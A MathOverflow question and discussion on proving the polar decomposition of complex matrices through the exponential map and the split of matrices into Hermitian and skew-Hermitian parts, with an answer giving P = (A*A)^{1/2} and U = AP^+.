self, float input0, float input1, float input2, radian = `True` )\n\nSets the Rotation from the Euler angles.\n\nParameters\n input0 : Roll value input1 : Pitch value input2 : Yaw value radian : Bool to define whether the angle in is radian (True) or degree (False). Default: True\n\n## ◆ inverse_mat()\n\n def inverse_mat ( self, Matrix3f rotation )\ninherited\n\nInverses the Matrix3f passed as a parameter.\n\nParameters\n rotation : the Matrix3f to inverse\nReturns\nthe inversed Matrix3f\n\n## ◆ transpose_mat()\n\n def transpose_mat ( self, Matrix3f rotation )\ninherited\n\nReturns the transpose of a Matrix3f.\n\nParameters\n rotation : the Matrix3f to compute the transpose from.\nReturns\nThe transpose of the given Matrix3f\n\n## ◆ set_identity()\n\n def set_identity ( self )\ninherited\n\nSets the Matrix3f to identity.\n\nReturns\nitself\n\n## ◆ identity()\n\n def identity ( self )\ninherited\n\nCreates an identity Matrix3f.\n\nReturns\na Matrix3f set to identity\n\n## ◆ zeros()\n\n def zeros ( self )\ninherited\n\nCreates a Matrix3f filled with zeros.\n\nReturns\nA Matrix3f filled with zeros\n\n## ◆ get_infos()\n\n def get_infos ( self )\ninherited\n\nReturns the components of the Matrix3f in a string.\n\nReturns\nA string containing the components of the current of Matrix3f\n\nReferenced by Matrix4f.m(), and Mat.verbose()." ]
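A hypothetical usage sketch pieced together from the methods documented above; the import path (pyzed.sl) and the default constructor are assumptions that should be checked against the installed ZED SDK version.

```python
import pyzed.sl as sl  # assumed import path for the ZED Python API

rot = sl.Rotation()                               # assumed default constructor
rot.set_euler_angles(0.1, 0.2, 0.3, radian=True)  # roll, pitch, yaw in radians

orientation = rot.get_orientation()        # Orientation corresponding to this Rotation
rodrigues = rot.get_rotation_vector()      # 3x1 rotation vector (Rodrigues formula)
angles = rot.get_euler_angles(radian=True) # back to Euler angles as a numpy array
print(rot.get_infos())                     # components of the underlying Matrix3f as a string
```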
[ null, "https://www.stereolabs.com/img/logo_stereolabs.svg", null, "https://www.stereolabs.com/docs/api/python/search/mag_sel.svg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5184017,"math_prob":0.8885368,"size":3811,"snap":"2022-40-2023-06","text_gpt3_token_len":1048,"char_repetition_ratio":0.22195955,"word_repetition_ratio":0.23034735,"special_character_ratio":0.2686959,"punctuation_ratio":0.2139535,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98989815,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-02-03T13:27:24Z\",\"WARC-Record-ID\":\"<urn:uuid:280c8320-353b-49b1-bf5b-ad7c22009011>\",\"Content-Length\":\"45169\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:75787593-dbeb-43f7-9a7a-8b6a6bfd9845>\",\"WARC-Concurrent-To\":\"<urn:uuid:031870cc-6676-489b-95f2-2e9b992c6f38>\",\"WARC-IP-Address\":\"199.16.130.189\",\"WARC-Target-URI\":\"https://www.stereolabs.com/docs/api/python/classpyzed_1_1sl_1_1Rotation.html\",\"WARC-Payload-Digest\":\"sha1:FU75VFSZUCINGV7LZMGQSFK4BA2ZGCUB\",\"WARC-Block-Digest\":\"sha1:ON6SVPHDGP2XIMD44TQN2LIHECC2VZIN\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764500056.55_warc_CC-MAIN-20230203122526-20230203152526-00145.warc.gz\"}"}
http://lambda.jimpryor.net/git/gitweb.cgi?p=lambda.git;a=blob;f=code/ski_evaluator.ml;h=15ee4a7766818dc84a551648da8b016897fd5da7;hb=7ea03edf218ad5b63cd7ee0faa33391e1f3893ae
[ "1 type term = I | S | K | App of (term * term)\n3 let skomega = App (App (App (S,I), I), App (App (S,I), I))\n4 let test = App (App (K,I), skomega)\n6 let reduce_if_redex (t:term):term = match t with\n7   | App(I,a) -> a\n8   | App(App(K,a),b) -> a\n9   | App(App(App(S,a),b),c) -> App(App(a,c),App(b,c))\n10   | _ -> t\n12 let is_redex (t:term):bool = not (t = reduce_if_redex t)\n14 let rec reduce_try2 (t:term):term = match t with\n15   | I -> I\n16   | K -> K\n17   | S -> S\n18   | App (a, b) ->\n19       let t' = App (reduce_try2 a, reduce_try2 b) in\n20       if (is_redex t') then let t'' = reduce_if_redex t'\n21                             in reduce_try2 t''\n22                        else t'\n24 let rec reduce_lazy (t:term):term = match t with\n25   | I -> I\n26   | K -> K\n27   | S -> S\n28   | App (a, b) ->\n29       let t' = App (reduce_lazy a, b) in\n30       if (is_redex t') then let t'' = reduce_if_redex t'\n31                             in reduce_lazt t''\n32                        else t'" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6434666,"math_prob":0.97971106,"size":609,"snap":"2019-26-2019-30","text_gpt3_token_len":222,"char_repetition_ratio":0.19669421,"word_repetition_ratio":0.116071425,"special_character_ratio":0.41215107,"punctuation_ratio":0.15972222,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9858141,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-07-23T21:58:27Z\",\"WARC-Record-ID\":\"<urn:uuid:46cf2bb4-38f3-413f-a58e-258e500c9f53>\",\"Content-Length\":\"14495\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9c249fd3-0c5c-4dc0-9338-cb43042d91fd>\",\"WARC-Concurrent-To\":\"<urn:uuid:67937391-e94d-4036-8feb-2e6c61352c93>\",\"WARC-IP-Address\":\"45.79.164.50\",\"WARC-Target-URI\":\"http://lambda.jimpryor.net/git/gitweb.cgi?p=lambda.git;a=blob;f=code/ski_evaluator.ml;h=15ee4a7766818dc84a551648da8b016897fd5da7;hb=7ea03edf218ad5b63cd7ee0faa33391e1f3893ae\",\"WARC-Payload-Digest\":\"sha1:EC4MEPS62EBHPQH57XPUJ6AKVODKBP7N\",\"WARC-Block-Digest\":\"sha1:XH4STBEW6EFXONDAOUITJOMMHH7JFVPN\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-30/CC-MAIN-2019-30_segments_1563195529737.79_warc_CC-MAIN-20190723215340-20190724001340-00016.warc.gz\"}"}
https://www.grimesmathematics.com/b/how-to-multiply-decimals
[ "# How to Multiply Decimals\n\nSo we all know how to multiply whole numbers. But do we all know how to multiply decimals without using a calculator?\n\nThis short video shows how to multiply decimals in very easy to follow steps.\n\n0 0\nFeed" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.78870845,"math_prob":0.9899298,"size":282,"snap":"2020-24-2020-29","text_gpt3_token_len":65,"char_repetition_ratio":0.17266187,"word_repetition_ratio":0.08695652,"special_character_ratio":0.22340426,"punctuation_ratio":0.054545455,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9900775,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-07-14T18:16:36Z\",\"WARC-Record-ID\":\"<urn:uuid:17d8f0da-945d-432e-9ef2-c517187bc054>\",\"Content-Length\":\"54433\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:274a6d32-c5e7-49e2-b86e-ae96cd5d406e>\",\"WARC-Concurrent-To\":\"<urn:uuid:2e935728-168d-4168-9a4d-1f74450ec460>\",\"WARC-IP-Address\":\"185.58.213.107\",\"WARC-Target-URI\":\"https://www.grimesmathematics.com/b/how-to-multiply-decimals\",\"WARC-Payload-Digest\":\"sha1:IUFCO5QHMTNBQ6EETXNL6JFGFZ32ARKT\",\"WARC-Block-Digest\":\"sha1:WD5RNHE7VHH6GL7J4LHQBZW6BEG26THO\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-29/CC-MAIN-2020-29_segments_1593657151197.83_warc_CC-MAIN-20200714181325-20200714211325-00365.warc.gz\"}"}
https://answers.everydaycalculation.com/add-fractions/9-49-plus-8-90
[ "Solutions by everydaycalculation.com\n\n9/49 + 8/90 is 601/2205.\n\n1. Find the least common denominator or LCM of the two denominators:\nLCM of 49 and 90 is 4410\n2. For the 1st fraction, since 49 × 90 = 4410,\n9/49 = 9 × 90/49 × 90 = 810/4410\n3. Likewise, for the 2nd fraction, since 90 × 49 = 4410,\n8/90 = 8 × 49/90 × 49 = 392/4410\n810/4410 + 392/4410 = 810 + 392/4410 = 1202/4410\n5. 1202/4410 simplified gives 601/2205\n6. So, 9/49 + 8/90 = 601/2205\n\nMathStep (Works offline)", null, "Download our mobile app and learn to work with fractions in your own time:" ]
[ null, "https://answers.everydaycalculation.com/mathstep-app-icon.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7665757,"math_prob":0.9908061,"size":316,"snap":"2020-45-2020-50","text_gpt3_token_len":125,"char_repetition_ratio":0.17307693,"word_repetition_ratio":0.0,"special_character_ratio":0.48101267,"punctuation_ratio":0.06849315,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99842036,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-11-25T17:42:34Z\",\"WARC-Record-ID\":\"<urn:uuid:88bacfc5-7696-495f-9cb9-9142d62fd731>\",\"Content-Length\":\"7797\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:4902e74b-95a4-45ce-b173-4909e0b86c6e>\",\"WARC-Concurrent-To\":\"<urn:uuid:35981d69-b1ca-4ac6-8c34-197ab5bc603f>\",\"WARC-IP-Address\":\"96.126.107.130\",\"WARC-Target-URI\":\"https://answers.everydaycalculation.com/add-fractions/9-49-plus-8-90\",\"WARC-Payload-Digest\":\"sha1:CFRXKPFFLY3KQ23TAJ54MXDWHSNYI4WC\",\"WARC-Block-Digest\":\"sha1:CF7BCLFGCB3XCGKUKFHZLTBA2KBAEYQG\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-50/CC-MAIN-2020-50_segments_1606141183514.25_warc_CC-MAIN-20201125154647-20201125184647-00418.warc.gz\"}"}
https://en.m.wikipedia.org/wiki/Synthetic_array_heterodyne_detection
[ "Optical heterodyne detection\n\n(Redirected from Synthetic array heterodyne detection)\n\nOptical heterodyne detection is a method of extracting information encoded as modulation of the phase, frequency or both of electromagnetic radiation in the wavelength band of visible or infrared light. The light signal is compared with standard or reference light from a \"local oscillator\" (LO) that would have a fixed offset in frequency and phase from the signal if the latter carried null information. \"Heterodyne\" signifies more than one frequency, in contrast to the single frequency employed in homodyne detection.\n\nThe comparison of the two light signals is typically accomplished by combining them in a photodiode detector, which has a response that is linear in energy, and hence quadratic in amplitude of electromagnetic field. Typically, the two light frequencies are similar enough that their difference or beat frequency produced by the detector is in the radio or microwave band that can be conveniently processed by electronic means.\n\nThis technique became widely applicable to topographical and velocity-sensitive imaging with the invention in the 1990s of synthetic array heterodyne detection. The light reflected from a target scene is focussed on a relatively inexpensive photodetector consisting of a single large physical pixel, while a different LO frequency is also tightly focussed on each virtual pixel of this detector, resulting in an electrical signal from the detector carrying a mixture of beat frequencies that can be electronically isolated and distributed spatially to present an image of the scene.\n\nHistory\n\nOptical heterodyne detection began to be studied at least as early as 1962, within two years of the construction of the first laser.\n\nContrast to conventional radio frequency (RF) heterodyne detection\n\nIt is instructive to contrast the practical aspects of optical band detection to Radio Frequency (RF) band heterodyne detection.\n\nEnergy versus electric field detection\n\nUnlike RF band detection, optical frequencies oscillate too rapidly to directly measure and process the electric field electronically. Instead optical photons are (usually) detected by absorbing the photon's energy, thus only revealing the magnitude, and not by following the electric field phase. Hence the primary purpose of heterodyne mixing is to down shift the signal from the optical band to an electronically tractable frequency range.\n\nIn RF band detection, typically, the electromagnetic field drives oscillatory motion of electrons in an antenna; the captured EMF is subsequently electronically mixed with a local oscillator (LO) by any convenient non-linear circuit element with a quadratic term (most commonly a rectifier). In optical detection, the desired non-linearity is inherent in the photon absorption process itself. Conventional light detectors—so called \"Square-law detectors\"—respond to the photon energy to free bound electrons, and since the energy flux scales as the square of the electric field, so does the rate at which electrons are freed. A difference frequency only appears in the detector output current when both the LO and signal illuminate the detector at the same time, causing the square of their combined fields to have a cross term or \"difference\" frequency modulating the average rate at which free electrons are generated.\n\nWideband local oscillators for coherent detection\n\nAnother point of contrast is the expected bandwidth of the signal and local oscillator. 
Typically, an RF local oscillator is a pure frequency; pragmatically, \"purity\" means that a local oscillator's frequency bandwidth is much much less than the difference frequency. With optical signals, even with a laser, it is not simple to produce a reference frequency sufficiently pure to have either an instantaneous bandwidth or long term temporal stability that is less than a typical megahertz or kilohertz scale difference frequency. For this reason, the same source is often used to produce the LO and the signal so that their difference frequency can be kept constant even if the center frequency wanders.\n\nAs a result, the mathematics of squaring the sum of two pure tones, normally invoked to explain RF heterodyne detection, is an oversimplified model of optical heterodyne detection. Nevertheless, the intuitive pure-frequency heterodyne concept still holds perfectly for the wideband case provided that the signal and LO are mutually coherent. Crucially, one can obtain narrow-band interference from coherent broadband sources: this is the basis for white light interferometry and optical coherence tomography. Mutual coherence permits the rainbow in Newton's rings, and supernumerary rainbows.\n\nConsequently, optical heterodyne detection is usually performed as interferometry where the LO and signal share a common origin, rather than, as in radio, a transmitter sending to a remote receiver. The remote receiver geometry is uncommon because generating a local oscillator signal that is coherent with a signal of independent origin is technologically difficult at optical frequencies. However, lasers of sufficiently narrow linewidth to allow the signal and LO to originate from different lasers do exist.\n\nPhoton Counting\n\nAfter optical heterodyne became an established technique, consideration was given to the conceptual basis for operation at such low signal light levels that \"only a few, or even fractions of, photons enter the receiver in a characteristic time interval\". It was concluded that even when photons of different energies are absorbed at a countable rate by a detector at different (random) times, the detector can still produce a difference frequency. Hence light seems to have wave-like properties not only as it propagates through space, but also when it interacts with matter. Progress with photon counting was such that by 2008 it was proposed that, even with larger signal strengths available, it could be advantageous to employ local oscillator power low enough to allow detection of the beat signal by photon counting. This was understood to have a main advantage of imaging with available and rapidly developing large-format multi-pixel counting photodetectors.\n\nPhoton counting was applied with frequency-modulated continuous wave (FMCW) lasers. Numerical algorithms were developed to optimize the statistical performance of the analysis of the data from photon counting.\n\nKey benefits\n\nGain in the detection\n\nThe amplitude of the down-mixed difference frequency can be larger than the amplitude of the original signal itself. The difference frequency signal is proportional to the product of the amplitudes of the LO and signal electric fields. Thus the larger the LO amplitude, the larger the difference-frequency amplitude. 
Hence there is gain in the photon conversion process itself.\n\n$I\\propto \\left[E_{\\mathrm {sig} }\\cos(\\omega _{\\mathrm {sig} }t+\\varphi )+E_{\\mathrm {LO} }\\cos(\\omega _{\\mathrm {LO} }t)\\right]^{2}\\propto {\\frac {1}{2}}E_{\\mathrm {sig} }^{2}+{\\frac {1}{2}}E_{\\mathrm {LO} }^{2}+2E_{\\mathrm {LO} }E_{\\mathrm {sig} }\\cos(\\omega _{\\mathrm {sig} }t+\\varphi )\\cos(\\omega _{\\mathrm {LO} }t)$\n\nThe first two terms are proportional to the average (DC) energy flux absorbed (or, equivalently, the average current in the case of photon counting). The third term is time varying and creates the sum and difference frequencies. In the optical regime the sum frequency will be too high to pass through the subsequent electronics. In many applications the signal is weaker than the LO, thus it can be seen that gain occurs because the energy flux in the difference frequency $E_{\\mathrm {LO} }E_{\\mathrm {sig} }$  is greater than the DC energy flux of the signal by itself $E_{\\mathrm {sig} }^{2}$ .\n\nPreservation of optical phase\n\nBy itself, the signal beam's energy flux, $E_{\\mathrm {sig} }^{2}$ , is DC and thus erases the phase associated with its optical frequency; Heterodyne detection allows this phase to be detected. If the optical phase of the signal beam shifts by an angle phi, then the phase of the electronic difference frequency shifts by exactly the same angle phi. More properly, to discuss an optical phase shift one needs to have a common time base reference. Typically the signal beam is derived from the same laser as the LO but shifted by some modulator in frequency. In other cases, the frequency shift may arise from reflection from a moving object. As long as the modulation source maintains a constant offset phase between the LO and signal source, any added optical phase shifts over time arising from external modification of the return signal are added to the phase of the difference frequency and thus are measurable.\n\nMapping optical frequencies to electronic frequencies allows sensitive measurements\n\nAs noted above, the difference frequency linewidth can be much smaller than the optical linewidth of the signal and LO signal, provided the two are mutually coherent. Thus small shifts in optical signal center-frequency can be measured: For example, Doppler lidar systems can discriminate wind velocities with a resolution better than 1 meter per second, which is less than a part in a billion Doppler shift in the optical frequency. Likewise small coherent phase shifts can be measured even for nominally incoherent broadband light, allowing optical coherence tomography to image micrometer-sized features. Because of this, an electronic filter can define an effective optical frequency bandpass that is narrower than any realizable wavelength filter operating on the light itself, and thereby enable background light rejection and hence the detection of weak signals.\n\nNoise reduction to shot noise limit\n\nAs with any small signal amplification, it is most desirable to get gain as close as possible to the initial point of the signal interception: moving the gain ahead of any signal processing reduces the additive contributions of effects like resistor Johnson–Nyquist noise, or electrical noises in active circuits. In optical heterodyne detection, the mixing-gain happens directly in the physics of the initial photon absorption event, making this ideal. 
Additionally, to a first approximation, absorption is perfectly quadratic, in contrast to RF detection by a diode non-linearity.\n\nOne of the virtues of heterodyne detection is that the difference frequency is generally far removed spectrally from the potential noises radiated during the process of generating either the signal or the LO signal, thus the spectral region near the difference frequency may be relatively quiet. Hence, narrow electronic filtering near the difference frequency is highly effective at removing the remaining, generally broadband, noise sources.\n\nThe primary remaining source of noise is photon shot noise from the nominally constant DC level, which is typically dominated by the Local Oscillator (LO). Since the shot noise scales as the amplitude of the LO electric field level, and the heterodyne gain also scales the same way, the ratio of the shot noise to the mixed signal is constant no matter how large the LO.\n\nThus in practice one increases the LO level, until the gain on the signal raises it above all other additive noise sources, leaving only the shot noise. In this limit, the signal to noise ratio is affected by the shot noise of the signal only (i.e. there is no noise contribution from the powerful LO because it divided out of the ratio). At that point there is no change in the signal to noise as the gain is raised further. (Of course, this is a highly idealized description; practical limits on the LO intensity matter in real detectors and an impure LO might carry some noise at the difference frequency)\n\nKey problems and their solutions\n\nArray detection and imaging\n\nArray detection of light, i.e. detecting light in a large number of independent detector pixels, is common in digital camera image sensors. However, it tends to be quite difficult in heterodyne detection, since the signal of interest is oscillating (also called AC by analogy to circuits), often at millions of cycles per second or more. At the typical frame rates for image sensors, which are much slower, each pixel would integrate the total light received over many oscillation cycles, and this time-integration would destroy the signal of interest. Thus a heterodyne array must usually have parallel direct connections from every sensor pixel to separate electrical amplifiers, filters, and processing systems. This makes large, general purpose, heterodyne imaging systems prohibitively expensive. For example, simply attaching 1 million leads to a megapixel coherent array is a daunting challenge.\n\nTo solve this problem, synthetic array heterodyne detection (SAHD) was developed. In SAHD, large imaging arrays can be multiplexed into virtual pixels on a single element detector with single readout lead, single electrical filter, and single recording system. The time domain conjugate of this approach is Fourier transform heterodyne detection, which also has the multiplex advantage and also allows a single element detector to act like an imaging array. SAHD has been implemented as Rainbow heterodyne detection in which instead of a single frequency LO, many narrowly spaced frequencies are spread out across the detector element surface like a rainbow. The physical position where each photon arrived is encoded in the resulting difference frequency itself, making a virtual 1D array on a single element detector. If the frequency comb is evenly spaced then, conveniently, the Fourier transform of the output waveform is the image itself. 
Arrays in 2D can be created as well, and since the arrays are virtual, the number of pixels, their size, and their individual gains can be adapted dynamically. The multiplex disadvantage is that the shot noise from all the pixels combines since they are not physically separated.\n\nSpeckle and diversity reception\n\nAs discussed, the LO and signal must be temporally coherent. They also need to be spatially coherent across the face of the detector or they will destructively interfere. In many usage scenarios the signal is reflected from optically rough surfaces or passes through optically turbulent media leading to wavefronts that are spatially incoherent. In laser scattering this is known as speckle.\n\nIn RF detection the antenna is rarely larger than the wavelength so all excited electrons move coherently within the antenna, whereas in optics the detector is usually much larger than the wavelength and thus can intercept a distorted phase front, resulting in destructive interference by out-of-phase photo-generated electrons within the detector.\n\nWhile destructive interference dramatically reduces the signal level, the summed amplitude of a spatially incoherent mixture does not approach zero but rather the mean amplitude of a single speckle. However, since the standard deviation of the coherent sum of the speckles is exactly equal to the mean speckle intensity, optical heterodyne detection of scrambled phase fronts can never measure the absolute light level with an error bar less than the size of the signal itself. This upper bound signal-to-noise ratio of unity is only for absolute magnitude measurement: it can have signal-to-noise ratio better than unity for phase, frequency or time-varying relative-amplitude measurements in a stationary speckle field.\n\nIn RF detection, \"diversity reception\" is often used to mitigate low signals when the primary antenna is inadvertently located at an interference null point: by having more than one antenna one can adaptively switch to whichever antenna has the strongest signal or even incoherently add all of the antenna signals. Simply adding the antennae coherently can produce destructive interference just as happens in the optical realm.\n\nThe analogous diversity reception for optical heterodyne has been demonstrated with arrays of photon-counting detectors. For incoherent addition of the multiple element detectors in a random speckle field, the ratio of the mean to the standard deviation will scale as the square root of the number of independently measured speckles. This improved signal-to-noise ratio makes absolute amplitude measurements feasible in heterodyne detection.\n\nHowever, as noted above, scaling physical arrays to large element counts is challenging for heterodyne detection due to the oscillating or even multi-frequency nature of the output signal. Instead, a single-element optical detector can also act like a diversity receiver via synthetic array heterodyne detection or Fourier transform heterodyne detection. With a virtual array one can then either adaptively select just one of the LO frequencies, track a slowly moving bright speckle, or add them all in post-processing by the electronics.\n\nCoherent temporal summation\n\nOne can incoherently add the magnitudes of a time series of N independent pulses to obtain a √N improvement in the signal to noise on the amplitude, but at the expense of losing the phase information.
Instead coherent addition (adding the complex magnitude and phase) of multiple pulse waveforms would improve the signal to noise by a factor of N, not its square root, and preserve the phase information. The practical limitation is adjacent pulses from typical lasers have a minute frequency drift that translates to a large random phase shift in any long distance return signal, and thus just like the case for spatially scrambled-phase pixels, destructively interfere when added coherently. However, coherent addition of multiple pulses is possible with advanced laser systems that narrow the frequency drift far below the difference frequency (intermediate frequency). This technique has been demonstrated in multi-pulse coherent Doppler LIDAR." ]
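The square-law mixing and phase preservation described above can be illustrated numerically. The sketch below is not from the article; the sample rate and the two tone frequencies are arbitrary stand-ins chosen so that the beat at |f_sig - f_lo| is easy to see in a discrete Fourier transform.

```python
import numpy as np

# A square-law detector responds to |E_sig + E_LO|^2; the cross term beats at
# the difference frequency with amplitude proportional to E_sig * E_LO.
fs = 1_000_000                                       # sample rate, Hz (arbitrary)
t = np.arange(0, 0.01, 1.0 / fs)                     # 10 ms record
f_sig, f_lo = 200_000.0, 190_000.0                   # stand-in signal and LO tones
E_sig = 0.01 * np.cos(2 * np.pi * f_sig * t + 0.3)   # weak signal, 0.3 rad phase
E_lo = 1.00 * np.cos(2 * np.pi * f_lo * t)           # strong local oscillator

i_det = (E_sig + E_lo) ** 2                          # detector output ~ intensity

spectrum = np.fft.rfft(i_det - i_det.mean())
freqs = np.fft.rfftfreq(t.size, 1.0 / fs)
peak = np.argmax(np.abs(spectrum) * (freqs < 50_000))  # ignore 2f and sum terms
print(freqs[peak])                                   # ~10000.0 Hz beat frequency
print(np.angle(spectrum[peak]))                      # ~0.3 rad: optical phase kept
```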
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8886249,"math_prob":0.9381049,"size":21553,"snap":"2019-26-2019-30","text_gpt3_token_len":4684,"char_repetition_ratio":0.16344146,"word_repetition_ratio":0.0025054808,"special_character_ratio":0.21570083,"punctuation_ratio":0.13706763,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9519675,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-06-27T06:14:20Z\",\"WARC-Record-ID\":\"<urn:uuid:3acc85ae-b359-4892-9cfc-9f440ee31642>\",\"Content-Length\":\"85861\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:6a6f6a1e-f42b-4e71-84e5-fbf5e5d55235>\",\"WARC-Concurrent-To\":\"<urn:uuid:5a688375-4fab-4e99-b203-b5705d3eead7>\",\"WARC-IP-Address\":\"208.80.154.224\",\"WARC-Target-URI\":\"https://en.m.wikipedia.org/wiki/Synthetic_array_heterodyne_detection\",\"WARC-Payload-Digest\":\"sha1:BJZUX7OJ2VOJN7L4DVKOSHWMQOENELRU\",\"WARC-Block-Digest\":\"sha1:AKC2F5BBOZBJ6MXIHJYY4O3V4DSORSY6\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-26/CC-MAIN-2019-26_segments_1560628000894.72_warc_CC-MAIN-20190627055431-20190627081431-00196.warc.gz\"}"}
https://mathoverflow.net/questions/312704/generalizing-polar-decomposition-of-matrices
[ "Generalizing Polar Decomposition of Matrices\n\nI am trying to find a certain proof of polar decomposition of complex matrices which I think should exist more generally for a certain class of Lie groups. Recall that the polar decomposition of a nonsingular complex matrix $$A \\in \\text{GL}_n(\\mathbb{C})$$ is an expression $$A = UP$$, where $$U \\in \\text{GL}_n(\\mathbb{C})$$ is unitary and $$P \\in \\text{GL}_n(\\mathbb{C})$$ is positive definite.\n\nMy attempt arises with a well known analogy between four classes of matrices and four sets of complex numbers:\n\n$$\\begin{array}{|c|c|} \\hline \\text{Subset of }\\text{Mat}_{n \\times n } (\\mathbb{C}) & \\text{Corresponding set in } \\mathbb{C} \\text{ } \\\\ \\hline \\text{Hermitian matrices} & \\text{Real numbers}\\\\ \\hline \\text{Skew-Hermitian matrices} & \\text{Imaginary numbers} \\\\ \\hline \\text{Hermitian positive definite matrices} & \\text{Positive real numbers} \\\\ \\hline \\text{Unitary matrices} & \\text{The unit circle in } \\mathbb{C}\\\\ \\hline \\end{array}$$\n\nThe analogy is justified through the observation that each set of matrices in the left column is precisely the set of unitarily diagonalizable matrices with eigenvalues in the corresponding set on the right. Moreover, the exponential map of matrices sends hermitian matrices to positive definite matrices and skew-hermitian to unitary matrices, a further similarity.\n\nIn showing polar decomposition, we take from the case for $$\\mathbb{C}$$; $$\\text{exp} : \\mathbb{C} \\rightarrow \\mathbb{C}^*$$ sends the reals to the positive reals, and imaginary numbers to the unit circle. Taking $$\\text{exp}$$ of $$z = \\text{Re}(z) + i \\ \\text{Im}(z)$$ gives us the polar decomposition $$\\text{exp}(z) = e^{\\text{Re}(z)} e^{i\\ \\text{Im}(z)}$$ into a positive real number and a complex number on the unit circle. This analogy is presumably where polar decomposition gets its name.\n\nPut $$\\mathfrak{g} = \\text{Mat}_{n \\times n } (\\mathbb{C})$$, the Lie algebra of $$G = \\text{GL}_n (\\mathbb{C})$$. I would like to use the decomposition $$\\mathfrak{g} = i \\mathfrak{h} \\oplus \\mathfrak{h}$$, where $$\\mathfrak{h}$$ is the sub-$$\\mathbb{C}$$-vector space of hermitian complex matrices and $$i \\mathfrak{h}$$ is the sub-Lie algebra of skew-Hermitian matrices to achieve a decomposition $$A = UP$$ of any $$A \\in \\text{GL}_n (\\mathbb{C})$$ into a unitary matrix $$U$$ and a positive definite matrix $$P$$, making use of the exponential map. However, there is an obvious obstruction: $$\\text{exp}(A + B)$$ is not $$\\text{exp}(A) \\text{exp}(B)$$ necessarily. 
So the question is, how might we work around this problem?\n\nNow, the subgroup $$U \\subset G$$ of unitary matrices acts on the sub-$$\\mathbb{C}$$-vector space $$P \\subset G$$ of hermitian positive definite matrices by $$(U, P) \\mapsto U^* P U$$, so this theorem will show that $$G$$ has a semi-direct product decomposition $$G = U \\times P$$ with product $$(U, P)(U', P') \\mapsto (UU' , U'^* P U' P)$$.\n\nIt is possibly useful to note that the map $$i \\mathfrak{h} \\rightarrow \\text{End}_{\\mathbb{C}}(\\mathfrak{h})$$ sending $$s$$ to $$\\text{ad}_s$$, where $$\\text{ad}_s (h) = sh - hs$$ is a Lie-algebra representation.\n\n• just to make sure I understand the question: I always thought of the polar decomposition $A=UP$ as the matrix analogue of $z=|z| e^{i\\,{\\rm arg}\\,z}$, so a decomposition into modulus and argument; then $P=(A^\\ast A)^{1/2}$ and $U=AP^+$ (with $P^+$ the pseudo-inverse); this is not what you want? – Carlo Beenakker Oct 13 '18 at 12:05\n• Hi Carlo, that works. I like that since we don't have to use a norm. But I meant to ask something more specific: can the idea above be continued? Specifically, the idea is to use the decomposition of $\\mathfrak{g}$ into $\\mathfrak{h}$ and $i \\mathfrak{h}$ and the exponential map. So, can we find a way to express $\\text{exp} ( s+ h) = UP$ where $s$ is skew hermitian (i.e. $ih'$ for some hermitian operator $h$), $h$ is hermitian, $U$ is unitary, and $P$ is positive definite? As noted, not as simple as the case for $\\mathbb{C}$, where $\\text{exp}(z + w) = \\text{exp}(z) \\text{exp}(w)$. – Dean Young Oct 13 '18 at 13:49\n• Part of my interest is that I want the analogy with $\\mathbb{C}$ to be more clearly expressed in the proof, but I don't know if it would work. – Dean Young Oct 13 '18 at 13:50\n• Actually, I think your method might lead to a way of saying just that - sorry. Maybe you can explain some of what you're thinking in an answer. – Dean Young Oct 13 '18 at 13:53\n• One source of the analogies mentioned at the outset is the classic book by Paul Halmos, Finite Dimensional Vector Spaces. – Jim Humphreys Oct 13 '18 at 14:49\n\nI have always understood the polar decomposition as the matrix analogue of $$z=|z|e^{i\\,{\\rm arg}z}$$ so a decomposition into modulus and argument; the OP want the matrix analogue of a decomposition into real and imaginary parts, $$z=e^{{\\rm Re}\\,z}e^{i\\,{\\rm Im}\\,z}$$, which I have never encountered and may not exist for the reason mentioned by the OP ($$e^{X+iY}\\neq e^Xe^{iY}$$).\nIn any case, if we do follow the first approach, then $$P=(A^∗A)^{1/2}$$ and $$U=AP^+$$ (with $$P^+$$ the pseudo-inverse) gives the unique polar decomposition $$A=UP$$, with $$P$$ Hermitian positive semidefinite and $$U^+=U^\\ast$$.\n• Wait, it should be, \"set $z = e^w$. Then $z = e^{\\text{Re}(w)} 